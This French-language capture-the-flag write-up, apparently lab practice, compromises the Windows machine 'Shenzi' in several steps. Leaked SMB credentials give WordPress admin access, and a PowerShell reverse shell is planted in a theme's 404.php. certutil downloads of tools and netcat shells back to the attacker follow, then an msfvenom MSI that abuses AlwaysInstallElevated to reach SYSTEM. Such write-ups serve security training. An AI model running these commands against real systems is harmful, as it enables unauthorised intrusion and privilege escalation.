# Shenzi
`wordpress` `chisel` `msi` `AlwaysInstallElevated`
* Nom machine : Shenzi
* Difficulté : Intermédiaire
* OS : Windows
## Enumération
### NMAP
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 09:25 EDT
Nmap scan report for 192.168.218.55
Host is up (0.032s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn:
|_ http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.45.247' is not allowed to connect to this MariaDB server
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=8/3%Time=66AE2FED%P=x86_64-pc-linux-gnu%r(
SF:NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.247'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
### SMB (139/445)
```
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.218.55
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
Shenzi Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.218.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
──(kali㉿kali)-[~/oscp/shenzir]
└─$ smbclient //192.168.218.55/Shenzi
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 11:45:09 2020
.. D 0 Thu May 28 11:45:09 2020
passwords.txt A 894 Thu May 28 11:45:09 2020
readme_en.txt A 7367 Thu May 28 11:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 11:45:09 2020
why.tmp A 213 Thu May 28 11:45:09 2020
xampp-control.ini A 178 Thu May 28 11:45:09 2020
12941823 blocks of size 4096. 4833534 blocks available
smb: \> promp off
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (6.6 KiloBytes/sec) (average 6.6 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (53.3 KiloBytes/sec) (average 30.2 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (28.9 KiloBytes/sec) (average 29.8 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (1.6 KiloBytes/sec) (average 22.8 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (1.3 KiloBytes/sec) (average 18.5 KiloBytes/sec)
```
Intéressant ...
```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ cat passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight357
```
Nous avons donc qu'il y a sûrement un site wordpress sur le port 80... Dirsearch / gobuster ne menent à rien. Nous allons essayer après un grand nombre d'essai : `http://192.168.249.55/shenzi/`
### Wordpress (80)
```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ wpscan --url http://192.168.249.55/shenzi/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.249.55/shenzi/ [192.168.249.55]
[+] Started: Sun Aug 4 13:36:39 2024
{...}
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.249.55/shenzi/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
```
Nous avons trouvé qu'un seul user : admin. Nous pouvions déjà le trouver sur la page d'acceuil du site wordpress. Nous avons son mot de passe dans le fichier trouvé plus haut : `FeltHeadwallWight357`
## Accès initial
{% embed url="" %}
Nous allons obtenir un reverse shell à partir des thèmes.
Tout d'abord, nous copions PHP cmd à partir de :
Nous avons copié le code puis nous l'avons copié dans le thème Twenty Twenty et 404.php.
Nous allons ensuite sur la page `http://192.168.249.55/shenzi/wp-admin/themes/twentytwenty/404.php` et collons le reverse-shell Powershell #3 (base64) du site précédent avec notre adresse ip et le port d'écoute correspondant.
Nous avons lancé un listener au même moment
```
┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56842
whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi>
```
## Elévation des privilèges
Nous avons téléchargé winpeas.exe après avoir lancé un server python sur le port 80 de notre machine kali. Mais impossible de l'exécuter. Nous avons donc téléchargé nc.exe pour essayer avec un autre shell.
```
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/winpeas.exe win.exe
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/nc.exe nc.exe
PS C:\users\shenzi\desktop> ./nc.exe 192.168.45.180 1235 -e cmd
```
```
──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56917
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\users\shenzi\desktop>win.exe
win.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
{...}
���������� Found Wordpress Files
File: C:\xampp\htdocs\shenzi\wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'shenzi' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', '' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');
define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');
{...}
```
Il fonctionne. Nous sommes également retombé sur mysql, avec l'utilisateur root et sans mot de passe.
```
C:\users\shenzi\desktop>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\users\shenzi\desktop> Get-ChildItem -Path "C:\" -Recurse -File -include "*mysql.exe*" -ErrorAction SilentlyContinue
Directory: C:\xampp\mysql\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/10/2019 6:49 AM 3742632 mysql.exe
```
Impossible de l'exécuter.
Je vais tenter d'effectuer une redirection de port afin d'avoir accès à mysql et phpmyadmin.
Machine victime :
```
C:\users\shenzi\desktop>chisel server -p 7777 -reverse
chisel server -p 7777 -reverse
2024/08/04 11:42:41 server: Reverse tunnelling enabled
2024/08/04 11:42:41 server: Fingerprint uh8e6jJeT5akIYbRhOg4jRAeMcf6+gt4c13gfViXQKA=
2024/08/04 11:42:41 server: Listening on http://0.0.0.0:7777
```
Machine kali :
```
┌──(kali㉿kali)-[~/Tools]
└─$ ./chisel client 192.168.249.55:7777 3333:localhost:3306
2024/08/04 14:44:26 client: Connecting to ws://192.168.249.55:7777
2024/08/04 14:44:27 client: Connected (Latency 32.808945ms)
```
7777: port servant à lier les deux machines. 3306 : port qui m'intéresse sur la machine cible. 3333 : port que je vais utiliser pour accéder à 3306 de ma cible.
Nous n'avons rien trouvé de concluant via le port 3306. Nous avons également essayé de regarder le port 80 notamment la page phpmyadmin, rien non plus. Nous avons aussi essayé d'uploader un fichier php nous permettant d'exécuter des commandes, mais nous sommes toujours shenzi.
{% embed url="" %}
Nous n'avons donc pas de piste.
Nous allons retourner à notre cher WinPeas.exe. Nous avons effectivement loupé une information
```
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```
Nous allons encore nous aider d'Hacktricks à la différence que nous allons créer un reverse-shell plutôt qu'un ajout d'utilisateur. Dans tous les cas le fichier généré sera .msi
{% embed url="" %}
```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=4444 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi
```
Nous allons le télécharger sur notre machine cible et l'exécuter
```
PS C:\xampp\htdocs\shenzi> cd /users/shenzi/desktop
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/rev.msi rev.msi
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\users\shenzi\desktop> ./rev.msi
```
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 57705
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
```
Nous sommes Nt authority / system !